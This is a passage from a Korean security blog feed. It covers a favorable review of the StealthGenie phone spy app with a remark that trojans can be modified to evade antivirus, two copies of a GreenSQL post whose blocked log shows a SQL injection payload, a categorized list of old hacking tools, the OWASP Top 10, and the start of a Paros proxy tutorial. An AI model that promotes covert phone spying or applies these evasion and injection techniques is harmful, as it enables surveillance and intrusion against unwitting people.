Helvetica;">. </span></span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #303030;"><span style="font-size: 15pt;"><strong><span style="font-family: 맑은 고딕;">즉각적인</span> <span style="font-family: 맑은 고딕;">경계경보</span></strong></span> </span></p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie</span><span style="font-family: 맑은 고딕;">의</span> <span style="font-family: 맑은 고딕;">흥미로운</span> <span style="font-family: 맑은 고딕;">기능</span> <span style="font-family: 맑은 고딕;">중</span> <span style="font-family: 맑은 고딕;">하나는</span> <span style="font-family: 맑은 고딕;">사용자가</span><span style="font-family: Helvetica;"> '</span><span style="font-family: 맑은 고딕;">의심스러운</span><span style="font-family: Helvetica;">' </span><span style="font-family: 맑은 고딕;">단어와</span> <span style="font-family: 맑은 고딕;">전화번호를</span> <span style="font-family: 맑은 고딕;">지정할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있는</span> <span style="font-family: 맑은 고딕;">기능입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">특정한</span> <span style="font-family: 맑은 고딕;">단어나</span> <span style="font-family: 맑은 고딕;">단어</span> <span style="font-family: 맑은 고딕;">세트가</span> <span style="font-family: 맑은 고딕;">대상</span> <span style="font-family: 맑은 고딕;">전화기에</span> <span style="font-family: 맑은 고딕;">입력이</span> <span style="font-family: 맑은 고딕;">되면</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">여러분은</span> <span style="font-family: 맑은 고딕;">즉각적인</span> <span style="font-family: 맑은 고딕;">경계경보를</span> <span style="font-family: 맑은 고딕;">받게</span> <span style="font-family: 맑은 고딕;">됩니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">전화번호에</span> <span style="font-family: 맑은 고딕;">대해서도</span> <span style="font-family: 맑은 고딕;">동일합니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">여러분은</span> <span style="font-family: 맑은 고딕;">이메일</span> <span style="font-family: 맑은 고딕;">및</span><span style="font-family: Helvetica;">/</span><span style="font-family: 맑은 고딕;">또는</span><span style="font-family: Helvetica;"> SMS</span><span style="font-family: 맑은 고딕;">을</span> <span style="font-family: 맑은 고딕;">통해</span> <span style="font-family: 맑은 고딕;">즉각적인</span> <span style="font-family: 맑은 고딕;">통지를</span> <span style="font-family: 맑은 고딕;">받게</span> <span style="font-family: 맑은 고딕;">됩니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">제가</span> <span style="font-family: 맑은 고딕;">알고있는</span> <span style="font-family: 맑은 고딕;">한</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">현</span> <span style="font-family: 맑은 고딕;">시점에서</span><span style="font-family: Helvetica;">StealthGenie</span><span style="font-family: 맑은 고딕;">가</span> <span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">제공하는</span> <span style="font-family: 맑은 고딕;">유일한</span> <span style="font-family: 맑은 고딕;">회사이며</span> <span style="font-family: 맑은 고딕;">이</span> <span style="font-family: 맑은 고딕;">기능은</span> <span style="font-family: 맑은 고딕;">분명히</span> <span style="font-family: 맑은 고딕;">어떤</span> <span style="font-family: 맑은 고딕;">상황에서</span> <span style="font-family: 맑은 고딕;">유용한</span> <span style="font-family: 맑은 고딕;">것입니다</span><span style="font-family: Helvetica;">. </span></span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie</span><span style="font-family: 맑은 고딕;">는</span> <span style="font-family: 맑은 고딕;">아이폰</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">안드로이드와</span> <span style="font-family: 맑은 고딕;">블랙베리</span><span style="font-family: Helvetica;"> iOS </span><span style="font-family: 맑은 고딕;">또는</span><span style="font-family: Helvetica;"> OS</span><span style="font-family: 맑은 고딕;">가</span> <span style="font-family: 맑은 고딕;">장착된</span> <span style="font-family: 맑은 고딕;">전화기와</span> <span style="font-family: 맑은 고딕;">태블릿에</span> <span style="font-family: 맑은 고딕;">작동합니다</span><span style="font-family: Helvetica;">. Symbian</span><span style="font-family: 맑은 고딕;">과</span> <span style="font-family: 맑은 고딕;">윈도우</span> <span style="font-family: 맑은 고딕;">사용자에게는</span> <span style="font-family: 맑은 고딕;">유감스럽지만</span><span style="font-family: Helvetica;">, </span><span style="font-family: 맑은 고딕;">현</span> <span style="font-family: 맑은 고딕;">시점에서</span><span style="font-family: Helvetica;"> StealthGenie</span><span style="font-family: 맑은 고딕;">는</span> <span style="font-family: 맑은 고딕;">해당</span> <span style="font-family: 맑은 고딕;">기기를</span> <span style="font-family: 맑은 고딕;">제공하지</span> <span style="font-family: 맑은 고딕;">않습니다</span><span style="font-family: Helvetica;">. </span></span></p>
<p style="background: white;"> </p>
<p style="background: white;"><span style="color: #3e3e3e;"><span style="font-family: Helvetica;">StealthGenie</span><span style="font-family: 맑은 고딕;">는</span> <span style="font-family: 맑은 고딕;">광고하는</span> <span style="font-family: 맑은 고딕;">그대로</span> <span style="font-family: 맑은 고딕;">작동하는</span> <span style="font-family: 맑은 고딕;">훌륭한</span> <span style="font-family: 맑은 고딕;">기능을</span> <span style="font-family: 맑은 고딕;">많이</span> <span style="font-family: 맑은 고딕;">갖추고</span> <span style="font-family: 맑은 고딕;">있는</span> <span style="font-family: 맑은 고딕;">잘</span> <span style="font-family: 맑은 고딕;">설계되고</span> <span style="font-family: 맑은 고딕;">사용자</span> <span style="font-family: 맑은 고딕;">친화적인</span> <span style="font-family: 맑은 고딕;">스파이</span> <span style="font-family: 맑은 고딕;">전화기</span> <span style="font-family: 맑은 고딕;">앱입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">저는</span> <span style="font-family: 맑은 고딕;">그</span> <span style="font-family: 맑은 고딕;">기능</span> <span style="font-family: 맑은 고딕;">중</span> <span style="font-family: 맑은 고딕;">어느</span> <span style="font-family: 맑은 고딕;">것에서도</span> <span style="font-family: 맑은 고딕;">문제를</span> <span style="font-family: 맑은 고딕;">발견할</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">없었으며</span> <span style="font-family: 맑은 고딕;">모든</span> <span style="font-family: 맑은 고딕;">기능이</span> <span style="font-family: 맑은 고딕;">이해하고</span> <span style="font-family: 맑은 고딕;">사용하기에</span> <span style="font-family: 맑은 고딕;">아주</span> <span style="font-family: 맑은 고딕;">쉬웠습니다</span><span style="font-family: Helvetica;">. <br /><br /></span><span style="font-family: 맑은 고딕;">제어판은</span> <span style="font-family: 맑은 고딕;">간단하며</span> <span style="font-family: 맑은 고딕;">전혀</span> <span style="font-family: 맑은 고딕;">기술적이지</span> <span style="font-family: 맑은 고딕;">않은</span> <span style="font-family: 맑은 고딕;">타입의</span> <span style="font-family: 맑은 고딕;">사람들이라고</span> <span style="font-family: 맑은 고딕;">하더라도</span> <span style="font-family: 맑은 고딕;">제어와</span> <span style="font-family: 맑은 고딕;">설정을</span> <span style="font-family: 맑은 고딕;">통해</span> <span style="font-family: 맑은 고딕;">상당히</span> <span style="font-family: 맑은 고딕;">빨리</span> <span style="font-family: 맑은 고딕;">다룰</span> <span style="font-family: 맑은 고딕;">수</span> <span style="font-family: 맑은 고딕;">있게</span> <span style="font-family: 맑은 고딕;">될</span> <span style="font-family: 맑은 고딕;">것입니다</span><span style="font-family: Helvetica;">. </span><span style="font-family: 맑은 고딕;">데모</span> <span style="font-family: 맑은 고딕;">페이지는</span><span style="font-family: Helvetica;">StealthGenie </span><span style="font-family: 맑은 고딕;">가</span> <span style="font-family: 맑은 고딕;">무엇이며</span> <span style="font-family: 맑은 고딕;">어떻게</span> <span style="font-family: 맑은 고딕;">사용하는지에</span> <span style="font-family: 맑은 고딕;">대한</span> <span style="font-family: 맑은 고딕;">감을</span> <span style="font-family: 맑은 고딕;">익히려는</span> <span style="font-family: 맑은 고딕;">신규</span> <span style="font-family: 맑은 고딕;">사용자에게</span> <span style="font-family: 맑은 고딕;">확실히</span> <span style="font-family: 맑은 고딕;">추천할만한</span> <span style="font-family: 맑은 고딕;">것입니다</span><span style="font-family: Helvetica;">. </span></span></p>
<p><span style="color: #3e3e3e;"><span style="font-family: Helvetica; background-color: white;">StealthGenie</span><span style="font-family: 맑은 고딕; background-color: white;">는</span> <span style="font-family: 맑은 고딕; background-color: white;">주위에서</span> <span style="font-family: 맑은 고딕; background-color: white;">가장</span> <span style="font-family: 맑은 고딕; background-color: white;">저렴한</span> <span style="font-family: 맑은 고딕; background-color: white;">옵션은</span> <span style="font-family: 맑은 고딕; background-color: white;">아니지만</span><span style="font-family: Helvetica; background-color: white;">, </span><span style="font-family: 맑은 고딕; background-color: white;">두</span> <span style="font-family: 맑은 고딕; background-color: white;">패키지에서</span> <span style="font-family: 맑은 고딕; background-color: white;">제공하는</span> <span style="font-family: 맑은 고딕; background-color: white;">기능을</span> <span style="font-family: 맑은 고딕; background-color: white;">고려해볼</span> <span style="font-family: 맑은 고딕; background-color: white;">때</span> <span style="font-family: 맑은 고딕; background-color: white;">가격은</span> <span style="font-family: 맑은 고딕; background-color: white;">충분히</span> <span style="font-family: 맑은 고딕; background-color: white;">경쟁적이며</span><span style="font-family: Helvetica; background-color: white;"> </span><span style="font-family: 맑은 고딕; background-color: white;">회사에</span> <span style="font-family: 맑은 고딕; background-color: white;">대한</span> <span style="font-family: 맑은 고딕; background-color: white;">평판도</span> <span style="font-family: 맑은 고딕; background-color: white;">좋습니다</span><span style="font-family: Helvetica; background-color: white;">. </span><span style="font-family: 맑은 고딕; background-color: white;">이</span> <span style="font-family: 맑은 고딕; background-color: white;">회사는이제</span> <span style="font-family: 맑은 고딕; background-color: white;">꽤</span> <span style="font-family: 맑은 고딕; background-color: white;">오래</span> <span style="font-family: 맑은 고딕; background-color: white;">전부터</span> <span style="font-family: 맑은 고딕; background-color: white;">이</span> <span style="font-family: 맑은 고딕; background-color: white;">사업에</span> <span style="font-family: 맑은 고딕; background-color: white;">종사해왔고</span> <span style="font-family: 맑은 고딕; background-color: white;">자사</span> <span style="font-family: 맑은 고딕; background-color: white;">제품의</span> <span style="font-family: 맑은 고딕; background-color: white;">기능을</span> <span style="font-family: 맑은 고딕; background-color: white;">혁신적이고</span> <span style="font-family: 맑은 고딕; background-color: white;">유용한</span> <span style="font-family: 맑은 고딕; background-color: white;">방식으로</span> <span style="font-family: 맑은 고딕; background-color: white;">계속</span> <span style="font-family: 맑은 고딕; background-color: white;">발전시키고</span> <span style="font-family: 맑은 고딕; background-color: white;">있습니다</span><span style="font-family: Helvetica; background-color: white;">. </span></span></p>
<p> </p>
<p><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕; background-color: white;">결론</span><span style="font-family: Helvetica; background-color: white;"> : </span></span></p>
<p> </p>
<p><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕; background-color: white;">지금도</span> <span style="font-family: 맑은 고딕; background-color: white;">넷버스</span> <span style="font-family: 맑은 고딕; background-color: white;">등</span> <span style="font-family: 맑은 고딕; background-color: white;">트로이</span> <span style="font-family: 맑은 고딕; background-color: white;">목마가</span> <span style="font-family: 맑은 고딕; background-color: white;">존재</span> <span style="font-family: 맑은 고딕; background-color: white;">합니다</span><span style="font-family: Helvetica; background-color: white;">. (</span><span style="font-family: 맑은 고딕; background-color: white;">백신에</span> <span style="font-family: 맑은 고딕; background-color: white;">걸려서</span> <span style="font-family: 맑은 고딕; background-color: white;">사용못한다고</span><span style="font-family: Helvetica; background-color: white;"> ?) </span></span></p>
<p><span style="color: #3e3e3e;"><span style="font-family: 맑은 고딕; background-color: white;">오픈소스가</span> <span style="font-family: 맑은 고딕; background-color: white;">많아서</span> <span style="font-family: 맑은 고딕; background-color: white;">일부</span> <span style="font-family: 맑은 고딕; background-color: white;">소스를</span> <span style="font-family: 맑은 고딕; background-color: white;">수정하면</span> <span style="font-family: 맑은 고딕; background-color: white;">아직도</span> <span style="font-family: 맑은 고딕; background-color: white;">백신에</span> <span style="font-family: 맑은 고딕; background-color: white;">걸리지</span> <span style="font-family: 맑은 고딕; background-color: white;">않고</span><span style="font-family: Helvetica; background-color: white;"> PC</span><span style="font-family: 맑은 고딕; background-color: white;">를</span> <span style="font-family: 맑은 고딕; background-color: white;">장악</span> <span style="font-family: 맑은 고딕; background-color: white;">할</span> <span style="font-family: 맑은 고딕; background-color: white;">수</span> <span style="font-family: 맑은 고딕; background-color: white;">있습니다</span><span style="font-family: Helvetica; background-color: white;">. </span></span></p>
<p>스마트 폰이라고 이런 트로이목마 를 근본적으로 사용할수 없도록 할수 있는 방법이 없네요. 그나마 애플이 이런 면에서는 한수 위라고 생각합니다.</p>
<p> </p><p><strong><a href="https://youngsam.net/entry/%EC%95%84%EC%A7%81%EB%8F%84-%EC%8A%A4%EB%A7%88%ED%8A%B8%ED%8F%B0-%EB%8F%84%EC%B2%AD-%EC%9C%84%EC%B9%98%EC%B6%94%EC%A0%81-APP-%EC%9D%B4-%EC%9E%88%EC%8A%B5%EB%8B%88%EB%8B%A4?commentInput=true#entry1863WriteComment">댓글 쓰기</a></strong></p>[보안] Sql injection을 막아주는 Green SQLopenkrhttps://youngsam.net/entry/%EB%B3%B4%EC%95%88-Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL2012-08-24T10:55:55+09:002012-08-24T10:55:55+09:00GreenSQL( <A href="http://www.greensql.net/" target=_blank>http://www.greensql.net/</A> )은 MySQL에 대한 SQL 인젝션(Injection) 공격을 방어하는 프락시 개념의 어플리케이션이다. 웹페이지를 호출하면 DB쿼리는 먼저 GreenSQL 로 넘어겨지고, 검사한 후 정상적이면 MySQL 서버로 요청하는 과정을 거친다.<BR>GreenSQL을 설치하고 실행과정은 이렇다. MySQL 서버는 기존 그대로 실행(디폴트 3306 포트)하고, GreenSQL을 3305포트로 실행(127.0.0.1:3305)한다. 이 때 GreenSQL은 MySQL 서버로 커넥션이 이뤄진다. 웹페이지는 DB커넥션을 GreenSQL의 3305포트로 커넥션하도록 변경해주면 된다. (MySQL을 3305로, GreenSQL을 3306으로 실행할 수도 있을 것이다.)<BR><BR><BR>[ 이미지 출처 : GreenSQL 홈페이지 ]<BR><BR>DB 쿼리의 정상, 비정상은 어떻게 판단하는가?<BR><BR>1) '관리자가 실행할 SQL 유형'이나 '민간한 형태의 SQL 유형'(flush privileges, show 명령, 불법적 형태 등)을 패턴 매칭 방식으로 찾아서 불법 요청으로 간주한다. 예를들면 DB관리 명령어, DB 스키마를 변경시도하는 경우, 시스템 파일을 액세스하려는 경우 등을 불법으로 간주한다. 이 패턴에 대해서는 설정 파일을 통해서 변경이 가능하다.<BR><BR>2) 그후 각 쿼리 유형에는 점수가 할당되어 있는데, 이 점수를 합산한다. 지정된 값 이상이 될 경우, 경고 메시지를 뿌려주거나 차단할 수 있다. 유형은 다음과 같다.<BR><BR>* Access to sensitive tables increases risk query (users, accounts, credit information)<BR>* Comments inside SQL commands increases query risk<BR>* Usage of an empty password string<BR>* Found ‘or’ token inside query<BR>* Found SQL expression that always return true (SQL tautology)<BR>* Comparison of constant values (SQL tautology)<BR>* ... 등 ...<BR><BR>점수는 설정 파일을 통해서 변경이 가능하다. 다음은 샘플 설정 파일의 일부이다.<BR># If query risk is bigger then specified value, query will be blocked<BR>block_level = 30<BR># Level of risk used to generate warnings. It is recomended to run application<BR># in low warning level and then to acknowledge all valid queries and<BR># then to lower the block_level<BR>warn_level=20<BR># Risk factor associated with SQL comments<BR>risk_sql_comments=30<BR><BR>차단된 샘플 로그이다. (sCag님 제공. 감사합니다.)<BR><BR>2008-12-09 16:54:18 mysql SELECT * FROM user WHERE name = 'x' or 1=1; --' AND pwd=SHA('') blocked<BR><BR>GreenSQL에 대한 결론이다.<BR><BR>멋진 생각이다. ^^<BR>패턴 설정과 차단수준을 유동적으로 변경 가능하다.<BR>대부분의 리눅스 배포판을 지원하며, FreeBSD도 지원한다.<BR>성능 테스트 결과 약간의 성능 저하가 발생한다. (2~12%정도)<BR>대용량 서비스에서 사용하기는 무리가 있을 것 같다.<BR>소규모 사이트나 웹호스팅에서는 고려해볼만 하다.<BR>SQL Relay(DB 풀링과 로드발런싱 등)에서 제공하는 기능 등이 하나로 합쳐진다면 멋질 것 같다.<BR><BR>내용 출처 : <A href="http://truefeel.tistory.com/129" target=_blank>http://truefeel.tistory.com/129</A><BR><BR>다운로드 : <A href="http://www.greensql.net/download" target=_blank>http://www.greensql.net/download</A><p><strong><a href="https://youngsam.net/entry/%EB%B3%B4%EC%95%88-Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL?commentInput=true#entry1806WriteComment">댓글 쓰기</a></strong></p>해킹툴 기능별 분류 - 정리openkrhttps://youngsam.net/entry/%ED%95%B4%ED%82%B9%ED%88%B4-%EA%B8%B0%EB%8A%A5%EB%B3%84-%EB%B6%84%EB%A5%98-%EC%A0%95%EB%A6%AC2012-07-27T20:20:57+09:002012-07-27T20:20:57+09:00<p>============================================================================== <br>Trojan Virus / Hacking Tool <br>============================================================================== <br>Back Orifice 2000 --- cDc에서 공개한 백 오리피스 2000 <br>Back Orifice 1.20 --- cDc 에서 공개한 백 오리피스 <br>Back Orifice 1.3 --- 역시 BO의 업그레이드 버전 <br>주민등록번호생성기 --- 주민등록 번호 생성기 <br>Infector 2 --- V3에 안 잡히는 BOSERVE.EXE <br>Deep Bo --- BO의 업그레이드 버전!! (편리한 IP Sweep 기능) <br>Bo Plug-in --- 3가지 BO 플러그 인 (ButtTrumpet, SilkRope, BOFTP) <br>No BO 13a --- BO 해킹 방지 전문적으로 차단하는 프로그램 <br>Net Bus 1.70 --- BO랑 쌍벽을 이루는 Trojan Hacking 프로그램 <br>Net Bus Pro B --- 넷버스 2 프로 베타 버전 원제는 NetBus 2 Atomic Toxic <br>Ner Bus Pro 2.01 --- 넷버스 프로 2.01 <br>Netbus Pro 2.1 Dropper --- Netbus Pro 2.1 Dropper <br>Lock Down 2000 Trojan Virus --- 전문 검사+치료 프로그램 <br>BO SPY --- BO Gui쓰는 사람에게 <br>Cleaner 2.0 --- bo 검사 & 치료 프로그램 <br>BO Scanner --- Cleaner 2.0과 비슷한 프로그램 <br>BO Remove --- BO만 치료 <br>Modem Jammer --- IP경로 지우는 프로그램 <br>Infector 2 --- V3에 안 잡히는 BOSERVE.EXE <br>스쿨버스 --- 스쿨버스입니다. <br>Deepthroat --- nobo에 안걸 리는 bo 서버 <br>Subseven --- v1.7 트로이입니다. <br>Subseven --- 2.1 버그 패치 된 것 <br>Pphucker --- pphucker라는 트로이 </p><p>============================================================================== <br>포트스캔 <br>============================================================================== <br>Port Scanner --- 포트 스캐너입니다. <br>Port Pro // <br>Port Test // <br>ChaOscan // <br>Tcp port scanner // <br>FTP Scanner --- IP주소로 FTP서버를 찾아줌 </p><p>============================================================================== <br>WWW해킹 <br>============================================================================== <br>Wwwhack98 --- 가장 잘 알려진 웹 해킹 프로그램 <br>Webcrack --- 특별한 기능이 있는 웹 해킹 프로그램 <br>HackerTTP1_3 --- 가장 빠른 웹 해킹 프로그램 <br>Goldeneye --- Goldeneye라는 웹 해킹 프로그램 </p><p>============================================================================== <br>누킹 <br>============================================================================== <br>Mass nuker --- 매우 강력한 누킹 프로그램 <br>Port Fuck --- 윈도우 98의 포트를 막아줌 <br>Wiin nuke --- 95 화면을 먹통으로 만들어 버림 <br>Nuke --- 강력한 누킹 프로그램 <br>Nuke`em --- 컴퓨터를 다운시켜 버림 <br>E-mail Nuker --- 상대방의 E-MAIL을 날려버림 <br>Voob --- 컴퓨터를 다운시켜 버림 </p><p>=============================================================================== <br>키 로그 <br>============================================================================== <br>Keylog 97 --- 키보드를 통해 누른 어떤 글자도 날짜별로 체계적으로 저장 <br>Keylog25 // <br>Passpy // <br>Keylog // <br>Key rec // </p><p>============================================================================= <br>유닉스/리눅스 <br>============================================================================== <br>폭탄메일 스크립트 --- 리눅스/유닉스용 폭탄메일 <br>satan --- 취약점을 찾아내는 SATAN이라는 툴 <br>saint --- SATAN이 개선된 SAINT <br>hack unix --- 유닉스용 해킹 프로그램 <br>fire wall --- 리눅스용 방화벽 <br>스니퍼 --- 몰래 엿보는 프로그램 </p><p>============================================================================== <br>메일봄버 <br>============================================================================== <br>AnonMail --- 자신의 이메일 주소를 원하는데로.. <br>Avalanche --- 폭탄 메일 <br>QFbomber --- 사용법이 쉬운 메일 봄버 <br>Aenima17 --- 메일 봄버 <br>Bomb Mail --- 메일 봄버 <br>E-mail Bombing --- 메일 봄버 <br>Kaboom3 --- 메일을 999장 보냄 <br>Port Fuck! --- Win98 사용자에게 폭탄멜 보내기(누킹 툴 W98) </p><p>============================================================================== <br>크래커 <br>=============================================================================== <br>bus hacker --- 넷버스의 패스워드를 바꿔줌 <br>John the ripper --- 유닉스 PASSWD화일을 해독 <br>Crack Jack // <br>DateCrack --- 날짜제한을 없애줌 <br>Uunix password cracker --- 유닉스 패스워드 크래커. 도스용 <br>Zip ZIP --- 화일의 패스워드를 크랙 <br>트럼펫윈속 --- 트럼펫윈속의 패스워드를 크랙 <br>UNP --- 자체 압축기법 해제 <br>UX --- 자체 압축기법 해제 <br>마이크로 excel cracker --- 엑셀의 암호를 없애줌 <br>Soft Ice --- 윈도우용 소프트 아이스 <br>화면보호기 cracker --- 윈도우 스크린 세이버의 암호를 풀어줌 <br>John The Ripper 1.0 --- 가장 유명하고 강력한 크래킹 프로그램으로 전설적인 크래킹 기록을 세움 <br>codex TCP/IP Hacker </p><p>============================================================================== <br>패스워드 <br>============================================================================= <br>Dripper --- 현재 어떤 ID와 PW로 접속했는지 알려줌 <br>Revelation --- 윈도우에서 ****으로 표시된 PW를 알려줌 <br>Cmos password --- CMOS의 패스워드를 마음데로 </p><p>============================================================================== <br>바이러스 <br>============================================================================= <br>에루살렘 <br>핑퐁 <br>바이러스 메이커 1,2,3 </p><p>============================================================================ <br>방어/추적 <br>============================================================================== <br>Cleaner 2.0 --- 38개의 트로이를 스캔, 제거툴 <br>Visual Route --- ip만 입력하면 상대방의 국가, 지역까지.. <br>Lock Down 2000 --- 클리너에 버금가는 트로이 스캐너 <br>X-ray 파일 분석기 <br>Nobo --- BO 침투자를 막아주고 IP를 알려줌 <br>Bospy --- 딥보 침투자에게 역해킹.. <br>No Nuke --- 누킹을 막아줌 <br>Nuke Nabber --- 누깅을 막아줌 <br>Neotrc201 --- IP 추적기 <br>Antigen102 <br>Net Buster --- 넷버스를 없애주고 침입자를 물리 <br>Fire wall 98 --- 개인 방화벽 <br>Bo remover --- 백오리피스를 빠른속도로 없애줌 <br>Conseal fire wall --- 개인 방화벽 <br>T.D.S.2 --- 294개의 트로이를 제거해줌 </p><p>=========================================================================== <br>필수유틸 <br>============================================================================= <br>Jammer --- 자신의 접속 경로를 지워줍니다. <br>HAKTEK --- 포트스캔, 핑거, 메일봄버 등이 하나로 <br>com2exe --- *.com을 *.exe화일로... <br>bat2exe --- *.bat를 *.exe화일로... <br>exe2com --- *.exe화일을 *.com화일로... <br>mouse.com --- 가끔 필요한 마우스 띄우는 프로그램 <br>winnt->dos --- 윈도우nt 파일을 도스에서 마운트</p><p><strong><a href="https://youngsam.net/entry/%ED%95%B4%ED%82%B9%ED%88%B4-%EA%B8%B0%EB%8A%A5%EB%B3%84-%EB%B6%84%EB%A5%98-%EC%A0%95%EB%A6%AC?commentInput=true#entry1792WriteComment">댓글 쓰기</a></strong></p>주요 웹 취약점 TOP 10openkrhttps://youngsam.net/entry/%EC%A3%BC%EC%9A%94-%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-TOP-102012-07-20T21:19:37+09:002012-07-20T21:19:37+09:00A1: Injection <br>A2: Cross-Site Scripting (XSS) <br>A3: Broken Authentication and Session Management <br>A4: Insecure Direct Object References <br>A5: Cross-Site Request Forgery (CSRF) <br>A6: Security Misconfiguration <br>A7: Insecure Cryptographic Storage <br>A8: Failure to Restrict URL Access <br>A9: Insufficient Transport Layer Protection <br>A10: Unvalidated Redirects and Forwards<p><strong><a href="https://youngsam.net/entry/%EC%A3%BC%EC%9A%94-%EC%9B%B9-%EC%B7%A8%EC%95%BD%EC%A0%90-TOP-10?commentInput=true#entry1788WriteComment">댓글 쓰기</a></strong></p>Sql injection을 막아주는 Green SQLopenkrhttps://youngsam.net/entry/Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL2012-07-20T20:36:46+09:002012-07-20T20:36:46+09:00GreenSQL( <a href="http://www.greensql.net/" target="_blank">http://www.greensql.net/</a> )은 MySQL에 대한 SQL 인젝션(Injection) 공격을 방어하는 프락시 개념의 어플리케이션이다. 웹페이지를 호출하면 DB쿼리는 먼저 GreenSQL 로 넘어겨지고, 검사한 후 정상적이면 MySQL 서버로 요청하는 과정을 거친다.<br>GreenSQL을 설치하고 실행과정은 이렇다. MySQL 서버는 기존 그대로 실행(디폴트 3306 포트)하고, GreenSQL을 3305포트로 실행(127.0.0.1:3305)한다. 이 때 GreenSQL은 MySQL 서버로 커넥션이 이뤄진다. 웹페이지는 DB커넥션을 GreenSQL의 3305포트로 커넥션하도록 변경해주면 된다. (MySQL을 3305로, GreenSQL을 3306으로 실행할 수도 있을 것이다.)<br><br><br>[ 이미지 출처 : GreenSQL 홈페이지 ]<br><br>DB 쿼리의 정상, 비정상은 어떻게 판단하는가?<br><br>1) '관리자가 실행할 SQL 유형'이나 '민간한 형태의 SQL 유형'(flush privileges, show 명령, 불법적 형태 등)을 패턴 매칭 방식으로 찾아서 불법 요청으로 간주한다. 예를들면 DB관리 명령어, DB 스키마를 변경시도하는 경우, 시스템 파일을 액세스하려는 경우 등을 불법으로 간주한다. 이 패턴에 대해서는 설정 파일을 통해서 변경이 가능하다.<br><br>2) 그후 각 쿼리 유형에는 점수가 할당되어 있는데, 이 점수를 합산한다. 지정된 값 이상이 될 경우, 경고 메시지를 뿌려주거나 차단할 수 있다. 유형은 다음과 같다.<br><br>* Access to sensitive tables increases risk query (users, accounts, credit information)<br>* Comments inside SQL commands increases query risk<br>* Usage of an empty password string<br>* Found ‘or’ token inside query<br>* Found SQL expression that always return true (SQL tautology)<br>* Comparison of constant values (SQL tautology)<br>* ... 등 ...<br><br>점수는 설정 파일을 통해서 변경이 가능하다. 다음은 샘플 설정 파일의 일부이다.<br># If query risk is bigger then specified value, query will be blocked<br>block_level = 30<br># Level of risk used to generate warnings. It is recomended to run application<br># in low warning level and then to acknowledge all valid queries and<br># then to lower the block_level<br>warn_level=20<br># Risk factor associated with SQL comments<br>risk_sql_comments=30<br><br>차단된 샘플 로그이다. (sCag님 제공. 감사합니다.)<br><br>2008-12-09 16:54:18 mysql SELECT * FROM user WHERE name = 'x' or 1=1; --' AND pwd=SHA('') blocked<br><br>GreenSQL에 대한 결론이다.<br><br>멋진 생각이다. ^^<br>패턴 설정과 차단수준을 유동적으로 변경 가능하다.<br>대부분의 리눅스 배포판을 지원하며, FreeBSD도 지원한다.<br>성능 테스트 결과 약간의 성능 저하가 발생한다. (2~12%정도)<br>대용량 서비스에서 사용하기는 무리가 있을 것 같다.<br>소규모 사이트나 웹호스팅에서는 고려해볼만 하다.<br>SQL Relay(DB 풀링과 로드발런싱 등)에서 제공하는 기능 등이 하나로 합쳐진다면 멋질 것 같다.<br><br>다운로드 : <a href="http://www.greensql.net/download" target="_blank">http://www.greensql.net/download</a> <p><strong><a href="https://youngsam.net/entry/Sql-injection%EC%9D%84-%EB%A7%89%EC%95%84%EC%A3%BC%EB%8A%94-Green-SQL?commentInput=true#entry1778WriteComment">댓글 쓰기</a></strong></p>paros-3.2.13-win.exe - Paros (웹프록시) 사용법openkrhttps://youngsam.net/entry/paros-3213-winexe-Paros-%EC%9B%B9%ED%94%84%EB%A1%9D%EC%8B%9C-%EC%82%AC%EC%9A%A9%EB%B2%952011-11-12T15:51:22+09:002011-11-12T15:51:05+09:00<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">이 프록시 툴을 이용하여 중간에 요청 데이터를 볼 수 있고 또한 수정하여 요청할 수도
있습니다<span>. <br></span>바로 이런 방식으로 데이터를 변조하게 되는 것입니다</span></b><span style="font-family: 돋움;">.</span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">그럼 프록시 툴 중 대표적인 두
가지를 소개 합니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;"> </span>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">[1] <?xml:namespace prefix = st1 /><st1:place w:st="on">Paros</st1:place></span></b>
<p style="margin: 0cm 0cm 0pt;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">1. </span></b><b style="mso-bidi-font-weight: normal;"><span style="font-family: 돋움;">개요</span></b>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">현재 가장 많이 쓰이는 프록시
툴이라 할 수 있습니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">인터페이스가 상당히 직관적이며 조작
역시 편리 합니다<span>.</span></span>
<p style="margin: 0cm 0cm 0pt;"><span style="font-family: 돋움;">아래의 주소에서 다운 받을 수
있습니다<span>.</span></span>
